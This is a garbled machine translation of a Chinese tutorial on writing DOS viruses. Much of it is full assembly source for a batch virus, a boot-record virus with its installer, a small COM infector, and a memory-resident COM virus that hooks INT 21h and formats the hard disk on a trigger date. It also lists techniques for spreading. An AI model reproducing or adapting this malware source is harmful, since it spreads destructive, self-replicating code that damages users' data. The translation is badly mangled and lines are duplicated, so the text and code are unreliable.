Chapter 1 Imaginary Virus Program
If you understand the virus, you will have the same less understanding of the Nice la', then read the following program, will you find strange?
A batch of viruses
What is your first use batch program? Are you imagined that the batch of batch is also a virus?
@Echo off
REM file name Virus.bat
REM This virus infection automatically performs batch files
If Drive == "A: /" goto end123
If Drive == "C: /" goto end123
IF% comspec% == "c: /command.com" set drive = a: /
IF% comspec% == "a: /command.com" set drive = C: /
IF not exist% drive% autoexec.bat goto end123
Copy Virus.bat% Drive%> NUL
Echo Call Virus> TMP.DAT
COPY% Drive% AutoExec.bat tmp.dat> NUL
Del tmp.dat> NUL
: END123
Echo on
Chapter 2 Learn to write your own virus program
Professor how to write a virus is a very sensitive topic. Will this cause the disease? There are learning in the end
What is the need to write a virus? This involves a problem, causing sick hamars what is it? Yes
Because people who will write viruses too much or because people who know how to deal with the virus? When the liar is rampant everywhere, I
In the end, everyone should let everyone know how to be cheated to prevent being deceived or the actor should be concealed.
? What makes people understand whether it is to teach people illegal?
How to write main guidance records and Boot district viruses
What is the main boot record? Where is the main boot record? The main boot record is used to load hard disk activity
The program of the boot sector of the area. The main boot record is stored in the hard disk 0 channels 1 sector, the length is up to one
Sector. When starting from the hard disk, the BIOS boot program loads the main boot record to 0: 7C00H, and then will control
The right to hand over the main guidance record.
In general, the Boot district virus exists in a floppy disk. Because the floppy disk does not exist, you can see it as a floppy disk.
Main boot record. The boot zone of the floppy disk exists in its 0 side 1 sector, with a length of one sector.
The general main guidance records the principle of viruses.
In general, this virus is to save the original main guidance record and replace the original main briefing with its own procedure.
Guide record. When startup, when the virus is controlled, after completing his own treatment, the virus will be saved.
The original main guidance record is read into 0: 7C00, and then the control is handed over to the original boot record. This type of virus
Infection on the hard disk is usually infected with the floppy disk when starting with poison floppy disks.
When the floppy disk is operated.
Write the main guidance to record the virus needs to understand
1. What to use to save the original primary boot record.
It is well known that the file virus is used to save the part of the infected modification is the document. Is the guided virus also
Can you use file storage to be overwritten boot records? the answer is negative.
Since the main boot record of the virus is executed by the operating system, the function of the operating system cannot be used,
You can only use the BIOS function to call or use a direct IO design. General, use BIOS disk service
Save the main boot record in an absolute sector. Since the zero zero sectoral area is retained sectors,
Use it to save.
2, the BIOS disk service function call you need to master.
INT 13H Subfunction 02H Read Division
Its calling method is:
The entrance is:
AH = 02H
Al = number of sectors read
CH = track number
CL = sector number (starting from 1) DH = number one number
DL = physical drive letter
ES: BX -> Buffer to be filled
Return to: When the CF is set, the call failed
AH = state
Al = number of sectors actually read
INT 13H Subfunction 03H Word Demo
Its calling method is:
The entrance is:
AH = 03h
Al = number of sectors written
CH = track number
CL = sector number (starting from 1)
DH = number one number
DL = physical drive letter
ES: BX -> Buffer
Return to: When the CF is set, the call failed
AH = state
Al = number of sectors actually written
3. What this virus is infected
Generally, such viruses perform system monitoring by intercepting interrupt vectors INT 13H. When there is a floppy disk or hard disk
The magnetic pool of the magnetic pool is guaranteed. The virus will detect if it is clean, and if it is not infected, it is infected.
4. Resident location
The location is 40h: 13h, and the unit is KB. The viral body is present in the last few k memory.
An example of a main guidance record
INT13 Macro
Pushf
Call DWORD PTR CS: OLD13H
ENDM
JMP13 Macro
JMP DWORD PTR CS: OLD13H
ENDM
.286
Code segment
Assume CS: Code, DS: Code
ORG 100H
Start:
ORG 7C00H
Start:
JMP Short Begin
DB 20h DUP (0)
DB 'WN'
Begin:
XOR AX, AX
XOR AX, AX
Mov ES, AX
Push Word PTR ES: [13H * 4]
POP Word PTR CS: OLD13H
Push Word PTR ES: [13H * 4 2]
POP Word PTR CS: OLD13H 2
MOV AH, 04H
Int 1ah
CMP DL, 5
Jne Datenot1
CMP DH, 12H
Jne Datenot1
Call printmsg
Datenot1:
Push CS
POP DS
MOV AX, 40H
Mov ES, AX
Dec Word PTR ES: [13h]; Reduce Basic Memory 1K
MOV AX, ES: [13h]
MOV CL, 6; 2 & 10/2 & 4
SHL AX, CL;
Mov ES, AX
Mov ES, AX
MOV CX, 200h; 512 BYTES A Sector
MOV Si, 7C00H; The Begin Offet
MOV Di, 0
CLD
REP MOVSB
MOV AX, ES
SUB AX, 7C0H
Push AX
Mov Ax, Offset ThenextCommand
Push AX
MOV AX, ES
SUB AX, 7C0H; The Segment of the President
Mov ES, AX
MOV BX, 0
MOV DS, BX
Mov Word PTR DS: [13H * 4], Offset NewInt13h
MOV Word PTR DS: [13H * 4 2], AX
Retf
OLD13H DD?
THENEXTCOMMAND:
MOV AX, 0201H
MOV CX, 2
MOV CX, 2
CMP CS: theDrive, 80h
Je Hardisk
MOV CX, 4F0FH; IF is the floppy disk
Hardisk:
MOV DH, 0
Mov DL, CS: thedrive; the drive is 0 or 80h
MOV BX, 0
MOV ES, BX
MOV BX, 7C00H
Int13
MOV AX, 0
Push AX
MOV AX, 7C00H
Push AX
Retf
NEWINT13H:
CMP AX, 0201H
Je IsReadsector
JMP13
IsReadsector:
CMP CX, 1
JNE NOTREADSector
CMP DH, 0
JNE NOTREADSector
Call Readsector
JNE gotoend
; CMP DL, CS: THEDRIVE
JNE NOTREADSector; if the disk is the boot disk
PUSH CX
MOV CX, 2
CMP DL, 80H
Jae Hardread
MOV CX, 4F0FH
HardRead:
INT13; manufacturing uninfected description
POP CX
Retf 2
NOTREADSECTOR:
Call Readsector
Je Effected
Call Effect
Effected:
gotoend:
JMP13
JMP13
Readsector:
Pusha
MOV AX, 0201H
MOV DH, 0
MOV CX, 1
INT13; Use the read buffer as the old buffer
CMP Word PTR ES: [BX 20H 2], 'NW'
POPA
Retn
Effect:
Pusha
MOV AX, 0301H
MOV DH, 0
MOV CX, 2
CMP DL, 80H
Jae Hardeffect
MOV CX, 4F0FH
Hardeffect:
INT13; Backup the old boot record
MOV Si, BX
Add Si, 1B0H
Push ES
Push ES
POP DS
Push CS
POP ES
MOV DI, 7C00H 1B0H
MOV CX, 50H
CLD
REP MOVSB
MOV Si, BX
Add Si, 2
MOV DI, 7C00H 2
MOV CX, 20H
CLD
REP MOVSB
MOV AX, 0301H
MOV CX, 1
MOV DH, 0
Push CS
POP ES
Push AX
Mov Al, CS: theDrive
MOV CS: TheDriveSave, Al; Backup THEDRIVE
POP AX
POP AX
MOV CS: TheDrive, DL
And cs: the 0feh; set the 0 bit to zero
MOV BX, 7C00H
INT13; WRITE The Virus to Sector 1
Mov Al, CS: TheDriveSave
MOV CS: TheDrive, Al; Restore THEDRIVE
POPA
Retn
Printmsg Proc Near
MOV Si, Offset MSG
Push CS
POP DS
Mov Ah, 0eh
CLD
Printgoon:
Lodsb
CMP Al, 0
Je Printend
INT 10h
JMP PrintGoon
Printend:
JMP $
JMP $
MSG DB 'DON'' ', Today.', 0
THEDRIVE DB 80H
THEDRIVESAVE DB?
ORG 7DFEH
DB 55H, 0AAH
Printmsg Endp
Code ends
End Start
{This program uses to process the above virus programs to make it a binary of 256 bytes from 7C00h}
PROGRAM C2V;
VAR
F, F1: file of char;
CH: char;
Begin
Assign (F, Paramstr (1));
RESET (F);
Assign (F1, Paramstr (2));
ReWrite (f1);
Seek (F, $ 7B00);
While Not Eof (f) dobegin
READ (F, CH);
READ (F, CH);
Write (F1, CH);
END;
Close (f);
Close (F1);
End.
.title infect.asm
Comment ~
This program is used to rag
~
Code segment
Assume CS: Code, DS: Code
ORG 100H
Start:
MOV AX, 0201H
MOV BX, Offset thebuf
MOV CX, 1
MOV DX, 80H
INT 13h
MOV AX, 0301H
MOV CX, 2
INT 13h
MOV AX, 3D00H
MOV AX, 3D00H
MOV DX, Offset FileName
Int 21h
JNC @@ 1
MOV DX, Offset Openerror
MOV AH, 9
Int 21h
MOV AH, 4CH
Int 21h
@@1:
Mov Handle, AX
MOV BX, AX
MOV AH, 3FH
MOV CX, 512
MOV DX, Offset filebuf
Int 21h
MOV DI, Offset filebuf 2
Mov Si, Offset thebuf 2
CLD
MOV CX, 20H
REP MOVSB
MOV DI, OFFSET FILEBUF 1B0H
MOV SI, Offset thebuf 1B0H
MOV CX, 50H
CLD
REP MOVSB
MOV BX, Offset Filebuf
MOV CX, 1
MOV DX, 80H
MOV AX, 0301H
INT 13h
MOV BX, Handle
Mov Ah, 3EH
Int 21h
MOV AH, 4CH
Int 21h
THEBUF DB 512 DUP (0)
FILEBUF DB 512 DUP (0)
Handle DW 0
OpenError DB 'The File Viru.bin Not Found!', 07H, 0DH, 0AH, '$'
FileName DB 'Viru.bin', 0
Code ends
End Start
How to write an executable file virus
Executable file type virus is a big family in DOS viruses, as well as virus writing experts to show off their own
When the mini talent is. The infection is strange, the number of infected programs is numerous, and the sons of the Spring and Autumn Warring States Period
Hundreds of pairs, the virus is probably "viral security experts". Reasons One: Safety experts rely on treatment of viruses, have a written ability; 2: Safety experts will write viruses, but they will try to study viruses, they are reluctant to be robbed, and there is a suspect with a virus. Let us take a look at the programming method of executable file viruses, and its simple extent allows you to use the cheating virus experts. The smallest file-like virus I have written is about 100 compilation code. If I am like some anti-virus experts, I am afraid that I have to become the biggest anti-virus hero in the past few years. The executable file virus is broad and narrow. Generalized executable viruses include the generally described executable file viruses, source viruses, and even we have introduced BAT virus and now popular Word macro virus, the following we have only including narrow executable file viruses - --- COM type and Exe virus.
Write a COM virus and EXE virus very simple, let's first understand the structure of the COM file and the EXE file.
How to modify the executable?
The COM file is a single-segment execution structure, originating from the CPM-86 operating system, which performs file code and execution, and the memory shadow icon is exactly the same, and the offset address is 100h, corresponding to the offset of the file 0. Run our Debug program, let's take a practice. We took the experiment with more.com in the DOS6.22 Western version. C: /> Debug more.com
-u
-u
0CA4: 0100 B8371E MOV AX, 1E37; pay attention to the top three bytes
0CA4: 0103 BA3008 MOV DX, 0830
0CA4: 0106 3BC4 CMP AX, SP
0CA4: 0108 7369 JNB 0173
0CA4: 010A 8BC4 MOV AX, SP
0CA4: 010C 2D4403 SUB AX, 0344
0CA4: 010F 90 NOP
0CA4: 0110 25F0FF and AX, FFF0
0CA4: 0113 8BF8 MOV DI, AX
0CA4: 0115 B9A200 MOV CX, 00A2
0CA4: 0118 90 NOP
0CA4: 0119 Be7e01 MOV SI, 017E
0CA4: 011C FC CLD
0CA4: 011D F3 REPZ
0CA4: 011E A5 MOVSW
0CA4: 011F 8BD8 MOV BX, AX
-r
AX = 0000 bx = 0000 cx = 09f1 dx = 0000 sp = fffe bp = 0000 Si = 0000 di = 0000
DS = 0CA4 ES = 0CA4 SS = 0CA4 CS = 0CA4 IP = 0100 NV UP EI PL NZ NA PO NC
0CA4: 0100 B8371E MOV AX, 1E37
-A AF1
0CA4: 0AF1 MOV AH, 0
0CA4: 0AF3 INT 16; Waiting button
0CA4: 0AF5 CMP AL, 1B; Waiting for the ESC button
0CA4: 0AF7 JNZ AF1
0CA4: 0AF9 MOV WORD PTR [100], 37B8; Three bytes starting with the recovery program
0CA4: 0AFF MOV BYTE PTR [102], 1E
0CA4: 0B04 PUSH CS; Putting CS: 100
0CA4: 0B05 MOV SI, 100
0CA4: 0B08 PUSH SI
0CA4: 0B09 RETF; RETF Back to CS: 100, the program starts
0CA4: 0B0A
-a 100
0CA4: 0100 JMP AF1; change the program to the module that jumps to the modified
0CA4: 0103
-RCX
CX 09F1
: A0A
-w
Writing 00a0a Bytes
-Q
After the modification, let's perform more, find anything wrong? Haha, if you don't press the ESC key program, the process is simple:
1. Modify the commands at the beginning of the program into the program where you jump to the last added.
2, the first execution of the added program (equivalent to the viral module), wait for the ESC button
3. Press the ESC button to modify the command starting command, and the jump back is the first. (Executing the original program)
Ok, if you can understand this, you will not be very far away from your COM virus.
The EXE file is a multi-segment structure belonging to one of the most successful and complex designs of DOS.
To learn about the exe file, you first need the file header structure of Exe.
(Let's go to Wenyue.yeah.net to download a HelpStar. There are many things related to.)
EXE FILE HEADER FORMAT
Offset size description
00 2 Bytes .exe Type Flag, 4D5AH
02 2 Bytes bytes in the last page (512 bytes / page)
04 2 BYTES PAGES of the .exe file (include ExeHeader)
06 2 BYTES Reallocation Number
08 2 BYTES EXEHEADER SIZE (16 BYTES * THIS VALUE)
0A 2 Bytes MinalAlloc
0c 2 bytes maxalloc
0e 2 bytes the init stack segment
10 2 BYTES The int Stack Pointer
12 2 bytes Checksum
14 2 Bytes Code Pointer
16 2 Bytes Code Segment
18 2 BYTES The Offset of Reallocation Table
1A 2 bytes the overlay number make by link
Smart people should distinguish between our most interesting parts, offset 14 and 16, these two stuff is too important. They represent the execution code entrance address of the program.
DOS is a relocation method to EXE, which will be mentioned on many DOS advanced programming. If you haven't understood it, I will come to make a bit: I am 5 cent higher than Xiao Ming. So Xiaoming if 170cm, then I have 175cm, if Xiaoming 180cm, I have 185cm. Code segment is this 5 cm. Do a lot of TSR or drivers under DOS, we can't know that a program is loaded, but we can know that the beginning of the execution of an Exe program is much more than the first value loaded. DOS is to deal with the multi-segment mode of EXE through this simple addiction method. Now we know that the start execution code of the EXE file is from the load initial address code segment: code Pointer.
There is also a very interesting thing is an exeheader size that is offset by 8. This is useful for viral modification of the EXE file, which can be used to determine the code of the Exe file (Exeheader before the start of the code).
Then we can modify an exe file like this:
Put the EXE file fill 16 bytes (for segment), add your program segment to the end, and save the value of 14h and 16h offset in the EXE header, change the value of 14h in the EXE header The value of 100h, 16 (Exefilesize 15) Div 16 -EXEHEADERSIZE-16 (-16 is 100H = 16 * 16) Ok, do an experiment, I remember to return when I execute this code. Go to PSP OldSeg: Oldip.
How to spread viruses?
If a virus cannot spread, it will not be a virus. We call the Trojan, just like the more we modified above. COM. This problem that spreads is actually written by handmade methods into proceedings and let them infection. The writing of this module is time, but it is nothing more than some file read and write operations. Everyone can slowly debug, slowly write.
Way to virus spread
The spread module is written, and now what should be spread, how to spread will not be found, how to spread to get the maximum communication efficiency.
Now the file virus is basically propagated as follows:
1. Spread by check the catalog.
Intercept the INT 21H function 11h and 12h.
You can get control when you are DIR.
2, propagation by performing.
Intercept int 21H 4B sub function.
This way each executable is running in executing your eyes.
3. Communicate via file lookup.
Intercept INT 21H 4E, 4F sub function. This has escaped your eyes when you use the programming tools such as TC, TP.
4. Communication is performed when the file is closed.
Even if you are compiling now, you can also infect when the execution file is generated.
5, when you load it. . . . . . .
In short, there are many ways to spread, and it is difficult to prepare, as for which method is taken, this is your own ability.
Virus damage part
This problem doesn't seem to discuss, but I still need to talk.
A virus has a big damage, is it a good virus? I think a formatted virus will never pass because it does not flow. The attacks of the virus have basically had their conditions, and the traditional is judged. This is not necessarily a good way, I think this virus has little hazard unless there is not high, there is often no time to attack, many infected documents have been infected and cannot be performed. Now there is a virus that will have no anti-virus software before infection? Therefore, there are many viruses using a constantly destroyed approach, such as the current time dates and, as the target determination marker to be destroyed. . . . Of course, this is contradictory with the length of the virus, the more complex the algorithm, the larger the virus, the easier it is to be discovered.
The programming of the virus will be introduced here.
Below I gave an example of my own two COM viruses (and general different, viral infection in front of the program) and an executable document (EXE, COM) protection program (anti-infective procedure), the next one is not a virus, But it is also a scope of virus. There is a relatively large virus in two COM-type viruses, infected by DIR, and another is only 120 lines, but also five dirty and full, infected every time, everyone can learn from.
Here's it is to read an example and practice the training. If you don't understand, I will try my best if you write such a buzzy to me, I can spend some time to organize the future.
A minimum virus program
No resident memory
Infect the current directory when each execution
Macro: Pmain, Pend, Pushall, Popall See another example
This is just a simulated virus program.
I use infection in two COM type virus examples.
The front method, however, the real virus is mostly
Additional approach
Attached to two processing methods
One is to modify the first three bytes directly JMP to the virus program
Such OFFSET changes
For example, 100H in the virus program
It may become 1112h, etc.
Your program needs to do the following changes:
Put the length of the host program as a relative offset in BX
Use this form MOV AX, MyBuf [BX] each access data
Of course, when the first infection is infected, BX is 0
Or you can use the way to alignment
Modify the first few bytes of the host
MOV AX, CS
Add Ax (Suzhulen 15) / 16-16
Push AX
MOV AX, 100H
Push AX
Retf
This way you can keep your virus program remain at 100h.
But since it is just a method of writing a virus,
Our purpose is just to let everyone know the virus,
Cancel the fear of the virus and discuss the killing method of the virus
So my virus example does not count too much method.
~
INCLUDE stdio.h
INCLUDE PUSHPOP.ASM
PMain
DB 0ebh, 00; viral infection logo, JMP 102
MOV AH, 9
MOV DX, Offset MSG
INT 21h; episode section, display information
Push savesize
Pop SaveSize_; Save the previously saved part MOV AH, 1AH
MOV AH, 1AH
Push CS
POP DS
MOV DX, Offset DTABUF
INT 21h; set the pointer to the DTA
Mov Ah, 4EH
MOV CX, 4FH
MOV DX, Offset Findname
INT 21h; Start Finding COM files
NextFind:
JC Searchend
MOV DX, OFFSET DTABUF 30
MOV AX, 3D02H
INT 21H; DTABUF 30 is stored in the file name of the file
JC Searchend_
MOV FileHandle, AX
Call Effect; infection
Searchend_:
Push CS
POP DS
Mov Ah, 4FH
Int 21h
JMP nextfind
JMP nextfind
Searchend:
MOV AH, 1AH
Push CS
POP DS
MOV DX, 80H
INT 21h; set back to DTA's pointer
MOV SI, Savesize_
Add Si, 100H
MOV DI, 100H; move the saved host code to 100h
Push CS
POP DS
Push CS
POP ES
MOV AX, 100H
Push AX
CLD
MOV CX, Offset Endfile-100h
REP MOVSB
Retn
Effect proc near; viral infection program similar to another example
Pushall; no longer comment
Push CS
Push CS
POP DS
MOV BX, FileHandle
MOV CX, Offset Endfile-100h
MOV AX, 9000H
MOV DS, AX
MOV DX, 0
MOV AH, 3FH
Int 21h
CMP Word PTR DS: [0], 00EBH
JNZ Noteffect
Mov Ah, 3EH
MOV BX, CS: FileHandle
Int 21h
Popall
RET
Noteffect:
Push CS
POP DS
MOV BX, FileHandle
MOV AX, 4202H
MOV CX, 0
MOV DX, 0
MOV DX, 0
Int 21h
Mov Savesize, AX
MOV BX, FileHandle
MOV AH, 40H
MOV CX, Offset Endfile-100h
MOV DX, 0
MOV BX, 9000H
MOV DS, BX
MOV BX, CS: FileHandle
Int 21h
Push CS
POP DS
MOV AX, 4200H
MOV CX, 0
MOV DX, 0
MOV BX, FileHandle
Int 21h
MOV AH, 40H
MOV CX, Offset Endoffile-100H
MOV DX, 100H
MOV BX, FileHandle
Int 21h
Int 21h
Mov Ah, 3EH
MOV BX, FileHandle
Int 21h
Popall
RET
Effect endp
Findname DB '* .com', 0
FileHandle DW 0
DTABUF DB 80H DUP (0)
Savesize DW endoffile-100h
Savesize_ dw 0
MSG DB 'HELLO, Are you Tire? Good luck to you!', 0DH, 0AH, '$'
Endoffile:
Endfile:
MOV AX, 4C00H
Int 21h
Pend
First virus written
Of course, I didn't take it out of infection. (This is very important:))
The history of this virus should have been five years, so the level of writing should be said to be very low. I will keep it as an example. As a commemorative, it is also an example of a novice of the virus. This virus is infected by intercepting INT 21H, 12H sub-function infection, 11h, 12h is FCB mode's FCB mode Findfirst, FindNext intercepted 4E, 4F (FindFirst, Findnext) infected virus episodes on January 19, on the formatting hard disk (But it seems that it is wrong in the year, can't destroy the current microcomputer :)) The infection method of the virus is to move the front of the COM file (length of the virus), then cover the virus itself over the front of the host in front of the host It's all for everyone, I wrote ASM's habit of not comment.
Please compile under Masm5
~
Include stdio.h; intermediate includes PMain, Pend, Retms
Retms Macro
MOV AX, 4C00H
Int 21h
ENDM
PMain Macro
Code segment
Assume CS: Code, DS: Code
ORG 100H
Start:
ENDM
Pend macro
Code ends
End Start
ENDM
THESIZE EQU OFFSET ENDIT-100H; The length of the virus = the final offset minus the length of the PSP
Addnum Equ Thesize 200
WPT Equ Word PTR
BPT EQU BYTE PTR
FILEBUFOFS Equ Offset Endit 100
Stackofs Equ Offset Endit
Getdta macro; this Macro gets the DTA pointer
MOV AH, 2FH
INT 21h; Many things in the FCB mode are saved in the middle of the DTA.
Push ES
POP DS
Push bx
POP Si
POP Si
ENDM
Pushall Macro; Save the macro of the register
IRP REG,
Push REG
ENDM
Popall Macro; Restore Register Macro
IRP REG,
POP REG
ENDM
If you want to save your space, use the .286, change these two macro to Pusha & Popa
The structure of DTA Struc; Data Transfer Area, you can get file names for infection
Reserved DB 21 DUP (?)
Attr DB?
Time dw?
DATE DW?
FILSIZE DD?
FileName DB 13 DUP (?)
Freename DB?,?,?
DTA ENDS
PMain
JMP Begin
Thebegin DW Offset endit
Begin:
MOV AX, 0FFeEh; this is my virus resident sign judgment
Int 21h
CMP AX, 0eeffh; return to 0eeff indicates that already residing
JE Installed
MOV CS: showflag, -1
MOV AH, 2AH; look at the current date
Int 21h
CMP DL, 19; 19?
JNE NEXT
CMP DH, 1; January?
JNE NOTFORMATHDISK
MOV CS: showflag, 0
NotFormathDisk:
Call show; it's miserable, I have to format the hard drive.
NEXT:
XOR AX, AX
Mov ES, AX
MOV AX, ES: [21H * 4 2]
MOV BX, ES: [21h * 4]
MOV WPT CS: OLD21 2, AX
MOV WPT CS: Old21, Bx; Save Old Int 21h Interrupt Vector
Call getaddress; move the virus code to the high end
MOV AX, CS: AddR
MOV BX, Offset Int21HCLI
XOR CX, CX
MOV ES, CX
Mov ES: [21h * 4], BX
MOV ES: [21H * 4 2], AX; handle the control of int 21h to the virus
STI
INSTALLED:
MOV AX, CS
MOV DS, AX
Mov ES, AX
Mov Si, THEBEGIN
MOV Di, 100H
MOV CX, THSIZE; Restore Directive
CLD
REP MOVSB
JMP START; Jump back 100h, transfer
; Note: It may be Push CS,
; MOV AX, 100H, Push AX, RETF
DTASAVE DTA <>; save DTA buffer
AddR dw?
Flag DB 0
SAVESS DW?
Savesp dw?
Dtasize EQU 43; DTA size is 43 bytes
Handle DW?; Future files used in the future
NEXTFLAG DB?
GetDress proc near; virus resident module
MOV AX, CS
Dec AX
MOV ES, AX; segment values for MCB (MEMORY CONTROL Block)
MOV AX, ES: [3]; Get the block size of the MCB
MOV BX, OFFSET Endit;
Add bx, addnum;
Add BX, 15;
MOV CL, 4;
SHR BX, CL;
SUB AX, BX; reduces the block size of the MCB (the length of the virus * 2 200)
MOV ES: [3], AX; this left space to buffer the virus program and the viral read and written
MOV BX, CS
MOV BX, CS
Add Ax, BX
MOV CS: Addr, AX
MOV ES, AX; segment value for the virus resident space
XOR Si, Si
XOR DI, DI
Push CS
POP DS
MOV CX, Offset Endit
CLD
REP MOVSB; move the virus code to the space left
RET
GetDress Endp
Old21 DD?
INT24H Proc Far
MOV Al, 0
MOV CS: FLAG24H, -1; Prevent a serious mistake
Iret
FLAG24H DB 0; for example, a prompt appearing infective write protection
INT24H ENDP
CH24H proc Near; replace INT 24h
XOR AX, AX
Mov ES, AX
Mov ES, AX
MOV AX, ES: [24h * 4]
MOV BX, ES: [24h * 4 2]
MOV WPT CS: OLD24, AX
MOV WPT CS: OLD24 2, BX
MOV BX, CS
MOV AX, Offset Int24h
MOV ES: [24h * 4], AX
MOV ES: [24H * 4 2], BX
RET
CH24H ENDP
Res24 proc near; Restore INT 24h
XOR AX, AX
Mov ES, AX
MOV AX, WPT CS: OLD24
MOV BX, WPT CS: OLD24 2
MOV ES: [24h * 4], AX
MOV ES: [24H * 4 2], BX
RET
RES24 ENDP
OLD24 DD?
INT21H PROC FAR; infection monitoring core part, int 21h treatment
STI
STI
CMP AX, 0FfeeH; virus resident logo
JNE NEXT21H
MOV AX, 0eeffh; return has been residing
Iret
NEXT21H:
CMP AH, 4FH; Is FindNext?
JE FINDNEXT
CMP AH, 12H; Is it a FCB mode FindNext?
Jne Outint21h
MOV BPT CS: Nextflag, 0; Nextflag = 0 is represented as FCB FINDNEXT
JMP FindNext1
Outint21h:
JMP CS: OLD21
FINDNEXT:
MOV CS: Nextflag, 1; Nextflag = 1 is represented as 4f FindDNext
FINDNEXT1:
MOV CS: FLAG24H, 0;
MOV CS: SAVESS, SS
Pushall
MOV CS: Savesp, SP; Save SS, SP, then switch the stack
Mov DS, CS: Savess; Guaranteed DOS re-entry success
MOV Si, SP
MOV Si, SP
MOV AX, CS
Mov ES, AX
Mov Di, Stackofs
CLD
MOV CX, 50
REP MOVSW; Save 50 words stack, my TSR is often used
MOV AX, CS
Mov SS, AX
MOV SP, 100H; Switch Stack
Getdta; DS: Si -> DTA adress; get a pointer to DTA
Push CS
POP ES
Mov Di, Offset Dtasave
MOV CX, DTASIZE
CLD
REP MOVSB; saved DTA data
Call CH24H; Modify INT24H, guaranteed from severe errors
CMP BPT CS: NEXTFLAG, 1; Touch the DTA in a 4F mode
Je Notchangedta
Call Changedta; if it is a standard DTA mode to expand into an extended DTA
Notchangedta:
Call CmpifComfile; Judging whether the current file comes COM file
CMP Al, 0
JNE Hasbeen
Call cmpifbeen; is a COM file judgment is infected
CMP Al, 0
JNE Hasbeen
CMP CS: FLAG24H, -1; severe error, abandon infection
Je Hasbeen;
Call Dofile; otherwise infected
Hasbeen:
Call res24; restore INT24H
CLI
Push CS
POP DS
MOV ES, CS: Savess
Mov Si, Stackofs
MOV DI, CS: Savesp
CLD
MOV CX, 50
REP MOVSW; Restore Stack
Mov SS, CS: SAVESS
MOV SP, CS: Savesp; Restore Stack Register
STI
STI
Popall
JMP CS: OLD21; Transfusion INT 21h handler
INT21H ENDP
Cmpifcomfile Proc Near
Mov Si, Offset Dtasave.FileName
LoopCMP:
CMP BPT CS: [Si], 0
JE OUTCMP
Inc Si
JMP loopcmp
Outcmp:
CMP BPT CS: [Si-1], 'M'
JNE Notcomfile
CMP BPT CS: [Si-2], 'O'
JNE Notcomfile
CMP BPT CS: [Si-3], 'C'
JNE Notcomfile
CMP BPT CS: [Si-4], '.'; Compare the file extension is .com
JNE Notcomfile
MOV Al, 0
RET
Notcomfile:
Notcomfile:
MOV Al, -1
RET
CmpifComfile Endp
Cmpifbeen proc Near; see if it has been infected
Push CS
POP DS
Mov DX, Offset Dtasave.FileName
MOV AX, 3D00H
Int 21h
JC BEEN
MOV CS: Handle, AX
MOV AH, 3FH
MOV BX, CS: Handle
MOV CX, 2
MOV DX, FileBufofs
Int 21h
Mov Ah, 3EH
MOV BX, CS: Handle
Int 21h
MOV Si, 100H
MOV AX, DS: [Si]
Mov Si, FileBufofs
MOV BX, DS: [Si]
CMP AX, BX; Judgment Infection Sign, (the first two bytes)
Je Been
MOV Al, 0
RET
BEEN: MOV Al, -1
RET
Cmpifbeen ENDP
Dofile proc near; viral infection module, file processing process.
MOV AX, 4300H
Push CS
POP DS
Mov DX, Offset Dtasave.FileName
Int 21h
And Cl, 100111B
Mov dtasave.attr, cl
And Cl, 100B
JNZ out1; SYS file
MOV AX, 4301H
Mov DX, Offset Dtasave.FileName
MOV CX, 0; Clear file properties
Int 21h
JNC REPLACEOK
OUT1:
RET
Replaceok:
CMP CS: FLAG24H, -1;
Je Out1;
MOV AX, 3D02H; Read and write mode open file
Int 21h
JC OUT1
MOV CS: Handle, AX
MOV AH, 3FH
MOV BX, CS: Handle
MOV CX, THSESIZE
Push CS
POP DS
MOV DX, FileBufofs
INT 21h; will be the top paragraph (size is virus size)
JNC CONDOWRITE; read out
Mov DX, Offset Dtasave.FileName
MOV CL, CS: DTASAVE.ATTR
XOR CH, CH
MOV AX, 4301H; Restore file properties
Int 21h
RET
CONDOWRITE:
MOV AX, 4202H
MOV BX, CS: Handle
XOR CX, CX
XOR DX, DX
INT 21h; mobile file pointer to the end
Add Ax, 100H
Mov CS: Thebegin, AX
MOV DX, FileBufofs
MOV CX, THSESIZE
MOV BX, CS: Handle
MOV AH, 40H
INT 21h; write the code in front of the preserved host
MOV AX, 4200H;
XOR CX, CX
XOR DX, DX
MOV BX, CS: Handle
INT 21h; mobile file pointer to the forefront
MOV DX, 100H
MOV AH, 40H
MOV AH, 40H
MOV CX, THSESIZE
MOV BX, CS: Handle
INT 21h; writing virus to the beginning of the document
Mov Ah, 3EH
MOV BX, CS: Handle
INT 21h; Close file
Mov DX, Offset Dtasave.FileName
XOR CH, CH
MOV CL, CS: DTASAVE.ATTR
MOV AX, 4301H
INT 21h; Restore file properties
MOV Al, 0
RET
Dofile Endp
Changedta proc near; Different DTA due to 4F and 12H
MOV AH, CS: DTASAVE.RESERVED 7
CMP AH, 0; for the same treatment
JNE Notcur; Press the DTA format of 12H mode
; 4FH mode conversion
; Two DTA modes of DTA format
Refer to my explanation in my HelpStar
Push CS
POP DS
Mov Ah, 19H
Int 21h
MOV AH, Al
Inc AH
Notcur:
Add Ah, 'A'-1
MOV CS: DTASAVE.FILENAME, AH
MOV AH, ':'
MOV CS: DTASAVE.FILENAME 1, AH
Push CS
POP DS
MOV Si, Offset DTasave 1 7
Push CS
POP ES
MOV DI, Offset Dtasave.FileName 2MOV CX, 8
CLD
Loopch:
Lodsb
CMP Al, ''
Je Outloopch
Dec Si
Movsb
Loop loopch
Outloopch:
Mov al, '.'
MOV ES: [DI], Al
INC DI
MOV Si, Offset DTasave 9 7
MOV CX, 3
Loopch1:
Lodsb
CMP Al, ''
Je Outloopch1
Dec Si
Movsb
Loop loopch1
Outloopch1:
XOR AH, AH
MOV ES: [DI], AH
MOV CS: DTASAVE.ATTR, AH
RET
Changedta ENDP
Changedta ENDP
Show proc near; virus episode module
Push CS
POP DS
MOV DX, Offset Showmsg
MOV AH, 9
INT 21h; prompt information
Call form; formatting program
RET
Show endp
Showmsg db 07h, 'my dear xlm:', 0ah, 0DH
DB 'Happy Birthday and happy a new year!', 0ah, 0dh, 0ah, 0dh
DB 'Your Lem.', 0ah, 0DH
DB 0AH, 0DH, '$'
Showflag DB -1
Form Proc Near
JMP STAR_1
Format_msg db 0, 0, 0, 2; 0-39, 0-1, 0-8
DB 0, 1, 1, 2
DB 0, 0, 2, 2
DB 0, 1, 3, 2
DB 0, 0, 4, 2
DB 0, 1, 5, 2
DB 0, 1, 5, 2
DB 0, 0, 6, 2
DB 0, 1, 7, 2
DB 0, 0, 8, 2
STAR_1:
MOV AX, CS
Mov ES, AX
MOV DS, AX
MOV BX, Offset Format_MSG
MOV AH, 5
MOV Al, 0FFH
MOV DL, 80H
MOV DH, 0
MOV CX, 0
Pushf
DB 9ah; Call Absint13ADR
DD 0F000CC78H; INT 13 absolute address
Ret; Remove Ret, automatic restart
